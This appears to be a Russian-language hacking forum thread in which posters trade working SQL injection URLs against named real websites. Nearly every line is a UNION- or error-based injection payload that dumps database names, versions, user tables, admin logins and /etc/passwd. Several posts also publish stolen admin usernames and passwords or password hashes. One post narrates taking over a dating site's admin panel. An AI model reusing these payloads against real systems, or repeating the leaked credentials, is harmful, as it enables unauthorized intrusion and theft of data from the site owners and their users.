Информационный ресурс Code: http://www.rocit.ru/news/ITshownews.php3?id=-19060+union+select+1,2,3,4,5,6,7,convert(concat(database(),char(58),user(),version()),char),9,10/*
iran.ru Code: http://iran.ru/rus/print_news.php?news_id=-36994+union+select+1,2,convert(concat(database(),char(58),user(),version()),char),4,5,6,7,8/*
Наша цель : Code: www.rsi.ru Имя базы: Code: http://www.rsi.ru/News/news.asp?id=2354+or+2354=(select%20db_name())-- Наш юзверь: Code: http://www.rsi.ru/News/news.asp?id=2354+or+2354=(select%20system_user)-- Версия: Code: http://www.rsi.ru/News/news.asp?id=2354+or+2354=@@version-- перебераем таблицы: Code: http://www.rsi.ru/News/news.asp?id=2354+or+2354=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('T_LastDat','ORDERS','ClientShort','cnf_greenwood','cnf_rsi','cnf_rsi_parts','cnf_rsi_s','cnf_rsi_users'))-- Теперь перебераем колонки : Code: http://www.rsi.ru/News/news.asp?id=2354+or+2354=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='cnf_rsi_users'+AND+COLUMN_NAME+NOT+IN+('user','u_id','user_nm','user_bd'))--
Code: http://www.zondmarket.ru/?p=8&t=2&idst=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5,6,7/* http://www.zondmarket.ru/?p=8&t=2&idst=-1+union+select+1,2,concat(login,char(58),pass,char(58),name,char(58),prof,char(58),firma,char(58),production,char(58),email,char(58),adress,char(58),telefon),4,5,6,7+from+registration+limit+10,1/*
Code: http://www.idc.ul.ie/people.php?id=-42%20UNION%20SELECT%201,2,3,user,password,6,7,8,9,10,11,12+from+mysql.user/* http://www.idc.ul.ie/people.php?id=-42%20UNION%20SELECT%201,2,3,4,LOAD_FILE(0x2f6574632f706173737764),6,7,8,9,10,11,12/* Code: http://www.socs.nuigalway.ie/list_socs/viewSoc.php?id=-47+union+select+1,2/* глухарь =\
Code: http://exploits.elemneo.pl/index.php?download=-1+union+select+1,version(),3,4,5,6/* скуля в базе сплойтов))
Зараннее говорю - вы не подумайте, я в гугле набирал сайт занкомств!!! =))) Кстати, обратите внимание на гламурную ссылку на главной странице - admin... Решил чуток расписать... Обращаем внимание на то, что при $link = 2-1 картинка снизу соответствует $link = 1. Подбираем кол - во столбцов Смотрим версию. Так как 5 - ая версия, можно посмотреть таблицы, колонки. Конечно можно порадоваться таблице users, в которой записаны логины и пассы в чистом виде, но админа там нет, а кому нужны акки на этом сайте? Поэтому идем в таблицу adminip и перебираем там колонки... Бамс! 1 - ая колонкка и сразу pass. Ну что ж... Админка наша, победа нафиг! =D admin:q1a2z3x4s5w6e7d8c9v0 ( http://www.freelove.in.ua/admin.php ) Ps писанины стокоо...))
Code: http://www.optimed.ru/index.php?area=prod&part=-1+union+select+1,2,version(),4,5,6,7,8/* Code: http://www.optimed.ru/admin/ мб админская таблица и есть, но я ее не нашел)
Академия онанизма и мастурбации Code: http://[B][COLOR=YellowGreen]onanistov.net[/COLOR][/B]/kb.php?mode=cat&cat=-3+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(username,char(58),user_password),0),0),3,4,5,66,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20from%20phpbb_users+limit+1,1/* Thoral:cd0d2dcda0f8df2960f53e8dd699fdab Kamaz привет
Вывод в тайтле. 5 версия, но все прямые запросы с "from" блочит. Гифровать не пробовал( Пасы не нашел
походу пассы в 'pass', в остальных случаях выдает ошибку.. Code: http://nfs.com.ua/file_details.phtml?id=341+union+select+1,2,3,4,5,6,7,concat(name,0x3a,pass),9,10,11,12,13,14,15,16,17,18,19,20+from+members+limit+5,1/* либо логин в другой, либо справа не та форма авторизации.. странно, почему у всех 'name' префикс USSRx и почему все 'pass' 4хзначные..
Code: http://www.christymoore.com/lyrics_tabs_detail.php?id=-18%20UNION%20SELECT%201,2,table_name,4,5,6+from+INFORMATION_SCHEMA.TABLES+limit+25,1/* http://www.christymoore.com/lyrics_tabs_detail.php?id=-18%20UNION%20SELECT%201,2,concat(username,0x3a,password),4,5,6+from+admin/* www.christymoore.com/admin name: christymoore pass:cmbb Code: http://www.cttc.ie/memberdetails.php?id=-27+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(email,0x71),0x71),4,5,6,7,8,9,10+from+members/* таблицы не нашел=\
таблица юзер Code: http://avia-model.ru/show_cat2.php?grid=-1+union+select+concat_ws(0x3a,name,username,passwd,email)+from+user/* шоп имя:логин:хеш:мыло таблица админ Code: http://avia-model.ru/show_cat2.php?grid=-1+union+select+concat(username,0x3a,password)+from+admin/* пароли все в mysql4 пока не расшифровал =\
PHP: Первый скуль. http://projectors.toshiba.com.ru/news/list/show/?newsid=-27+union+select+1,2,database(),4,concat(user(),0x3a,version()),6,7,8,9,10,11,12, 14/*